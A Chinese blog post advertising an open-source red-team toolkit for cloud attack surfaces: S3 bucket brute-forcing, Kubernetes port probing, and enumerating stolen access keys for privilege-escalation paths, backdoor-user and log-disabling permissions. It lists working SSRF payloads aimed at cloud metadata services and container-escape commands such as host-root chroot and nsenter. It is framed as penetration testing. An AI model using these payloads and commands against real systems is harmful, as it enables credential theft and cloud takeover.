news 2026/7/29 14:22:11

云安全漏洞挖掘SKILL、一站式云漏洞挖掘工具,支持S3爆破、IMDS探测、K8s检测与AK/SK权限利用

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
云安全漏洞挖掘SKILL、一站式云漏洞挖掘工具,支持S3爆破、IMDS探测、K8s检测与AK/SK权限利用

0x01 工具介绍

cloud-vuln-skill 是一款轻量化、开源的云安全漏洞挖掘工具集,专为红队渗透与合规安全测试打造。工具无需复杂部署,可自动化完成S3存储桶爆破、云IMDS元数据探测、K8s未授权检测、容器逃逸风险筛查等核心操作。同时支持AK/SK凭据验证、权限枚举与提权路径分析,全程遵循只读探测原则,无破坏性操作,高效覆盖主流公有云漏洞攻击面,适配日常云资产风险巡检与实战攻防演练。

注意:现在只对常读和星标的才展示大图推送,建议大家把渗透安全HackTwo"设为星标⭐️"则可能就看不到了啦!

下载地址在末尾 #渗透安全HackTwo

0x02 功能介绍

✨核心特点

brute-s3— S3 桶名爆破

python scripts/cloud_scanner.py brute-s3 --keyword <关键词> [--threads 20] [--delay 0.1] [--format table|json]

将关键词与 70+ 常见后缀(-prod-dev-backup-terraform-secrets等)拼接,向 AWS 全球端点和区域端点并发 HTTP HEAD 请求。

状态码含义
200公开桶(可列目录)
403存在但非公开
404/DNS 失败不存在

参数:

  • --keyword:公司名/关键词(必填)

  • --threads:并发线程数(默认 15)

  • --delay:请求间隔秒数(默认 0.05,增大可避免云端限流)

  • --formatjson(默认)或table

check-bucket— 单桶公开状态检查

    python scripts/cloud_scanner.py check-bucket --name <桶名> [--region us-east-1]

    三项检测:

    • 公开可列— GET 桶根路径,200 且响应含<Key>即为可列目录

    • 公开可写— PUT 测试文件,200 即为可写(测试后自动清理)

    • 公开可读— HEAD 常见文件名

    scan-bucket— 公开桶敏感文件扫描

    python scripts/cloud_scanner.py scan-bucket --url <桶URL> [--max-files 100] [--threads 10]

    两级匹配机制:

    第一级(文件名匹配)— 13 类敏感文件,不需要下载:.envterraform.tfstatecredentialsid_rsa*.sql*.dumpconfig.ymlsecret.yamlDockerfile.git/config*.pem*.zip.bash_history

    第二级(内容关键词)— 仅下载 ≤10KB 的文件头部搜索:AKIAASIABEGIN RSA PRIVATE KEYDB_PASSWORD=AWS_ACCESS_KEY_ID=connectionStringBearerCREATE TABLE

    桶不可列时自动切换爆破模式,用 30 个常见文件名逐个探测。

    probe-ssrf— SSRF → IMDS 凭证窃取探测

    python scripts/cloud_scanner.py probe-ssrf --target <URL> --param <参数名>

    向目标 URL 的参数注入云元数据服务地址,检测响应中是否含云凭证关键词。

    注入的 Payload:

    #Payload目标
    1http://169.254.169.254/latest/meta-data/AWS IMDSv1
    2http://169.254.169.254/latest/meta-data/iam/security-credentials/AWS IAM Role 名
    3http://169.254.169.254/metadata/instance?api-version=2021-02-01Azure IMDS
    4http://metadata.google.internal/computeMetadata/v1/GCP
    5http://100.100.100.200/latest/meta-data/阿里云
    6http://[::ffff:a9fe:a9fe]/latest/meta-data/AWS IPv6 映射绕过

    probe-k8s— K8s 未授权访问探测

    python scripts/cloud_scanner.py probe-k8s --node <IP>

    扫描 7 个高危端口:

    端口服务探测路径
    6443K8s API (TLS)/api/v1/pods/api/v1/secrets/version
    8080K8s API (Plain)同上
    10250Kubelet/pods/runningpods/
    10255Kubelet RO/pods
    2379etcd/version/v2/keys
    4194cAdvisor/containers
    10256kube-proxy/healthz

    container-escape— 容器逃逸条件检测

    # 在容器/Pod 内运行python scripts/cloud_scanner.py container-escape

    11 项自动检测:

    检测危险度逃逸方法
    /var/run/docker.sock挂载🔴docker run -v /:/host alpine chroot /host
    Privileged 模式🔴nsenter --target 1 --mount --pid -- bash
    CAP_SYS_ADMIN🔴cgroup release_agent 逃逸
    CAP_SYS_PTRACE🔴宿主机进程注入
    hostPID🔴nsenter -t 1
    hostPath 挂载🔴直接读写宿主机文件
    K8s SA Token🟠调 API Server 操作资源
    IMDS 可达🟠获取云 IAM 凭证
    Containerd Socket🟠ctr 命令控制容器

    仅检测不利用,不会尝试实际逃逸。

    exploit-creds— AK/SK 验证与权限枚举

    python scripts/cloud_scanner.py exploit-creds --ak <AccessKey> --sk <SecretKey> [--token <SessionToken>] [-o result.json]

    一条命令完成五步:

    1. 身份验证sts:GetCallerIdentity→ Account ID、ARN

    2. IAM 信息收集— 附加策略、Inline Policy、所属组、MFA 状态

    3. 高危权限探测真实验证23 个 API(读操作直接调用,写操作使用安全假参数/DryRun 探测,不产生副作用)

    4. 提权路径分析— 匹配 10 种危险权限组合

    5. S3 桶枚举— 列出桶 + 检查 Block Public Access + 加密状态

    高危权限探测覆盖:

    类别探测命令验证方式
    直接提权iam:CreatePolicyVersion假策略 ARN 探测
    直接提权iam:AttachUserPolicy不存在的用户名探测
    后门iam:CreateUser+iam:CreateAccessKey不存在用户名探测
    EC2ec2:RunInstancesDryRun 模式(安全)
    Lambdalambda:UpdateFunctionCode不存在函数名 + 空 zip
    S3s3:PutBucketPolicy不存在桶名探测
    反取证cloudtrail:StopLogging直接调用(会失败但不产生效果)

    0x03 更新介绍

    增加其他厂商存储桶利用

    0x04 使用介绍

    📦安装与使用指南​​​​​​​

    cd cloud-vuln-skillpip install -r requirements.txt
    ​​​​​ # === 信息收集(无需云凭证)=== # S3 桶名爆破 python scripts/cloud_scanner.py brute-s3 --keyword company-name # 单桶公开状态检查 python scripts/cloud_scanner.py check-bucket --name company-prod # 公开桶敏感文件扫描 python scripts/cloud_scanner.py scan-bucket --url https://bucket-name.s3.amazonaws.com # SSRF → IMDS 凭证窃取探测 python scripts/cloud_scanner.py probe-ssrf --target https://target.com/api --param url # K8s 节点未授权访问探测 python scripts/cloud_scanner.py probe-k8s --node 10.0.0.1 # 容器逃逸条件检测(在容器/Pod 内运行) python scripts/cloud_scanner.py container-escape # === 凭据利用(拿到 AK/SK 后)=== python scripts/cloud_scanner.py exploit-creds --ak AKIAXXXXXX --sk xxxxxxxxxxxx

    0x05 下载

    《渗透安全HackTwo》回复20260728获取下载

    版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
    网站建设 2026/7/29 14:21:55

    5分钟掌握:Windows平台最强防撤回工具RevokeMsgPatcher终极指南

    5分钟掌握&#xff1a;Windows平台最强防撤回工具RevokeMsgPatcher终极指南 【免费下载链接】RevokeMsgPatcher :trollface: A hex editor for WeChat/QQ/TIM - PC版微信/QQ/TIM防撤回补丁&#xff08;我已经看到了&#xff0c;撤回也没用了&#xff09; 项目地址: https://g…

    作者头像 李华
    网站建设 2026/7/29 14:19:59

    Unity微信小游戏FairyGUI适配实战:资源加载、渲染与交互全解析

    1. 项目概述&#xff1a;当FairyGUI遇上微信小游戏 如果你正在用Unity开发微信小游戏&#xff0c;并且UI部分选择了FairyGUI这个强大的第三方UI框架&#xff0c;那么恭喜你&#xff0c;你已经走上了一条高效但也可能布满“小坑”的道路。我最近刚完成一个从Unity到微信小游戏的…

    作者头像 李华
    网站建设 2026/7/29 14:18:30

    项目:InnoAI SQL 助手

    目录 1. 项目说明 2. 项目背景知识 2.1. 系统需求 2.3. 大模型 API 2.4. 技术架构 2.4.1. 流程图 2.4.2. 架构说明 3. 软硬件环境清单 4. 项目实施 4.1. 环境搭建 4.1.1. 系统搭建及初始化 4.1.2. 源码编译安装Python3.11.9 4.1.3. 配置国内 pip 源及安装项目依赖 …

    作者头像 李华
    网站建设 2026/7/29 14:16:25

    【回眸】Airi 智能助手深度评测:从参数解析到实战边界

    在技术选型的关键节点&#xff0c;面对市面上层出不穷的大语言模型&#xff0c;开发者往往容易陷入参数迷阵。我们常常看到各种评测报告罗列着惊人的训练数据量或上下文窗口大小&#xff0c;但真正落地到实际业务中&#xff0c;这些数字能否转化为稳定的生产力&#xff0c;却是…

    作者头像 李华
    网站建设 2026/7/29 14:14:03

    Prometheus监控Nginx:核心指标与生产实践

    1. 项目概述&#xff1a;Prometheus监控Nginx的核心价值 在Web服务运维领域&#xff0c;Nginx作为承载业务流量的第一道入口&#xff0c;其性能指标直接决定了用户体验质量。我曾管理过日PV超千万的电商平台&#xff0c;某次大促期间正是因为及时发现Nginx的活跃连接数异常增长…

    作者头像 李华